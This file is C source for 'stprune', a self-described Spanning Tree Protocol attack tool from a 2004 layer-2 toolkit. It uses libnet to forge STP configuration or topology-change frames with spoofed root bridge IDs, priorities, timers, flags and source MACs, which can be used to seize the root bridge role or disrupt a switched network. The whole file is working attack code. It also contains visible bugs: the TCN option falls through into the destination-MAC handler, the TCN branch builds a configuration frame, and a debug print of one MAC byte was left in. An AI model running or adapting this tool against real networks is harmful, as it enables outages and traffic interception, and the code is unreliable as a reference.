/*
 *  $Id: stp.c,v 1.2 2004/05/26 04:11:06 mike Exp $
 *
 *  stprune
 *  STP attack tool
 *  Released as part of the MXFP Layer 2 Toolkit
 *  http://www.packetfactory.net/MXFP
 *
 *  Copyright (c) 2004 Mike D. Schiffman  <mike@infonexus.com>
 *  Copyright (c) 2004 Jeremy Rauch       <jrauch@cadre.org>
 *
 *  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */
#include <libnet.h>

#define CONF    1
#define TCN     2 

#define STP_PORT_PRIO        0x80   /* 128, max is 255 */
#define STP_PORT_NUM         1
#define STP_BRIDGE_PRIO      0x8000 /* 32k, max is 64k */
#define STP_PORT_COST        0x13   /* 19 is the recommended cost for 100mbit */
#define STP_TIMER_MULTIPLIER 256    /* all timers are tval / 256 */
#define STP_MESSAGE_AGE      0
#define STP_MAX_AGE          0x14   /* 20 seconds until new conf bpdu is sent */
#define STP_HELLO_TIME       0x2
#define STP_FORWARD_DELAY    0x0f

int usage(char *name);

int
main(int argc, char *argv[])
{
    int c, len, type, flag = 0;
    libnet_t *l;
    libnet_ptag_t t;
    u_int8_t *dst = libnet_hex_aton("01:80:C2:00:00:00", &len),
             *src = NULL, *id_temp;
    u_int8_t rootid[8], bridgeid[8];
    u_int8_t bridgeflag = 0, rootflag = 0;
    u_int16_t prio = STP_BRIDGE_PRIO;
    u_int16_t messageage = STP_MESSAGE_AGE, maxage = STP_MAX_AGE,
              hellotime = STP_HELLO_TIME, forwarddelay = STP_FORWARD_DELAY;
    u_int32_t pathcost = STP_PORT_COST;
    u_int8_t portid[2] = { STP_PORT_PRIO, STP_PORT_NUM };
    char *device = NULL;
    char errbuf[LIBNET_ERRBUF_SIZE];

    memset(rootid, 0, 8);
    memset(bridgeid, 0, 8);
    memcpy(rootid, &prio, 2);
    memcpy(bridgeid, &prio, 2);

    printf("STP prune...\n");

    device = NULL;
    type = CONF;

    while ((c = getopt(argc, argv, "a:b:B:c:d:f:hi:l:m:o:P:p:r:R:s:t:")) != EOF)
    {
        switch (c)
        {
            case 't':
                if (strcasecmp(optarg,"c") == 0)
                   type = CONF;
                if (strcasecmp(optarg, "t") == 0)
                break;
            case 'd':
                free(dst);
                dst = libnet_hex_aton(optarg, &len);
                break;
            case 'i':
                device = optarg;
                break;
            case 's':
                src = libnet_hex_aton(optarg, &len);
                break;
            case 'c':
                pathcost = strtoul(optarg, NULL, 0);
                break;
            case 'a':
                messageage = strtoul(optarg, NULL, 0);
                break;
            case 'l':
                hellotime = strtoul(optarg, NULL, 0);
                break;
            case 'm':
                maxage = strtoul(optarg, NULL, 0);
                break;
            case 'o':
                forwarddelay = strtoul(optarg, NULL, 0);
                break;
            case 'f':
                if(strcasecmp(optarg, "a") == 0)
                {
                    flag |= 0x80;
                }
                else
                {
                    if (strcasecmp(optarg, "c") == 0)
                    {
                        flag |= 0x1;
                    }
                }
                break;
            case 'p':
                portid[1] = (u_int8_t)strtoul(optarg, NULL, 0);
                break;
            case 'P':
                portid[0] = (u_int8_t)strtoul(optarg, NULL, 0);
                break;
            case 'b':
                id_temp = libnet_hex_aton(optarg, &len);
                memcpy(bridgeid + 2, id_temp, 6);
                free(id_temp);
                bridgeflag = 1;
                break;
            case 'B':
                prio = (u_int16_t)strtoul(optarg, NULL, 0);
                memcpy(bridgeid, &prio, 2);
                break;
            case 'r':
                id_temp = libnet_hex_aton(optarg, &len);
                memcpy(rootid + 2, id_temp, 6);
                free(id_temp);
                rootflag = 1;
                break;
            case 'R':
                prio = (u_int16_t)strtoul(optarg, NULL, 0);
                memcpy(rootid, &prio, 2);
                break;
            default:
                usage(argv[0]);
                exit(EXIT_FAILURE);
        }
    }

    l = libnet_init(LIBNET_LINK, device, errbuf);
    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE);
    }

    if (src == NULL)
    {
        src = (u_int8_t *)libnet_get_hwaddr(l);
    }

    if (rootflag != 1)
    {
        memcpy(rootid + 2, src, 6);
    }

    if (bridgeflag != 1)
    {
        memcpy(bridgeid + 2, src, 6);
    }

    printf("%x",src[2]);
    if (type == CONF)
    {
        t = libnet_build_stp_conf(
            0x0000,                                    /* protocol id */
            0x00,                                      /* protocol version */
            0x00,                                      /* BPDU type */
            flag,                                      /* BPDU flags */
            rootid,                                    /* root id */
            pathcost,                                  /* root path cost */
            bridgeid,                                  /* bridge id */
            *((unsigned short*)portid),                /* port id */
            messageage * STP_TIMER_MULTIPLIER,         /* message age */
            maxage * STP_TIMER_MULTIPLIER,             /* max age */
            hellotime * STP_TIMER_MULTIPLIER,          /* hello time */
            forwarddelay * STP_TIMER_MULTIPLIER,       /* forward delay */
            NULL,                                      /* payload */
            0,                                         /* payload size */
            l,                                         /* libnet context */
            0);                                        /* libnet ptag */

        if (t == -1)
        {
            fprintf(stderr, "Can't build STP conf header: %s\n",
                    libnet_geterror(l));
            goto bad;
        }
    }
    else
    {
        memset(rootid, 0, 8);
        memset(bridgeid, 0, 8);
        memset(portid, 0, 2);

        t = libnet_build_stp_conf(
            0x0000,                                    /* protocol id */
            0x00,                                      /* protocol version */
            0x80,                                      /* BPDU type */
            0x00,                                      /* BPDU flags */
            rootid,                                    /* root id */
            0x00000000,                                /* root path cost */
            bridgeid,                                  /* bridge id */
            *((unsigned short*)portid),                /* port id */
            0x00,                                      /* message age */
            0x0000,                                    /* max age */
            0x0000,                                    /* hello time */
            0x0000,                                    /* forward delay */
            NULL,                                      /* payload */
            0,                                         /* payload size */
            l,                                         /* libnet handle */
            0);                                        /* libnet id */
        if (t == -1)
        {
            fprintf(stderr, "Can't build STP tcn header: %s\n",
                    libnet_geterror(l));
            goto bad;
        }
    }

    t = libnet_build_802_2(
        LIBNET_SAP_STP,                                /* DSAP */
        LIBNET_SAP_STP,                                /* SSAP */
        0x03,                                          /* control */
        NULL,                                          /* payload */
        0,                                             /* payload size */
        l,                                             /* libnet handle */
        0);                                            /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build ethernet header: %s\n",
                libnet_geterror(l));
        goto bad;
    }

    t = libnet_build_802_3(
        dst,                                           /* ethernet destination */
        src,                                           /* ethernet source */
        LIBNET_802_2_H + ((type == CONF) ? LIBNET_STP_CONF_H :
        LIBNET_STP_TCN_H),                             /* frame size */
        NULL,                                          /* payload */
        0,                                             /* payload size */
        l,                                             /* libnet handle */
        0);                                            /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build ethernet header: %s\n",
                libnet_geterror(l));
        goto bad;
    }

    c = libnet_write(l);
    if (c == -1)
    {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        goto bad;
    }
    else
    {
        fprintf(stderr, "Wrote %d byte STP packet.\n", c);
    }
    free(dst);
    free(src);
    libnet_destroy(l);
    return (EXIT_SUCCESS);
bad:
    free(dst);
    free(src);
    libnet_destroy(l);
    return (EXIT_FAILURE);
}

int
usage(char *name)
{
    fprintf(stderr, "usage %s -t c|t [-a messageage] [-b bridgeid] [-B bridgeprio]\n\t[-c pathcost] [-d destmac] [-f a|c] [-i device] [-l hellotime]\n\t[-m maxage] [-o fwddelay] [-p portnum] [-P portprio]\n\t[-r rootid] [-R rootprio] [-s srcmac]\n",
                name);
    fprintf(stderr, " -t c|t \t: specify the type of STP packet, (c)onfig or (t)cn\n");
    fprintf(stderr, "[-a messageage]\t: specify the message age\n");
    fprintf(stderr, "[-b bridgeid]\t: specify the bridge id\n");
    fprintf(stderr, "[-B bridgeprio]\t: specify the bridge priority\n");
    fprintf(stderr, "[-c pathcost]\t: specify the path cost\n");
    fprintf(stderr, "[-d destmac]\t: specify the destination MAC\n");
    fprintf(stderr, "[-f a|c]\t: add (a)ck or topo (c)hange flag (NOTE: multiple -f allowed)\n");
    fprintf(stderr, "[-i device]\t: specify device to send out\n");
    fprintf(stderr, "[-l hellotime]\t: specify the hello interval (seconds)\n");
    fprintf(stderr, "[-m maxage]\t: specify the max age (seconds)\n");
    fprintf(stderr, "[-o fwddelay]\t: specify the forward delay (seconds)\n");
    fprintf(stderr, "[-p portnum]\t: specify the port number\n");
    fprintf(stderr, "[-P portprio]\t: specify the port priority\n");
    fprintf(stderr, "[-r rootid]\t: specify the root bridge id\n");
    fprintf(stderr, "[-R rootprio]\t: specify the root bridge priority\n");
    fprintf(stderr, "[-s srcmac]\t: specify the source mac\n");
    return 0;
}

/* EOF */
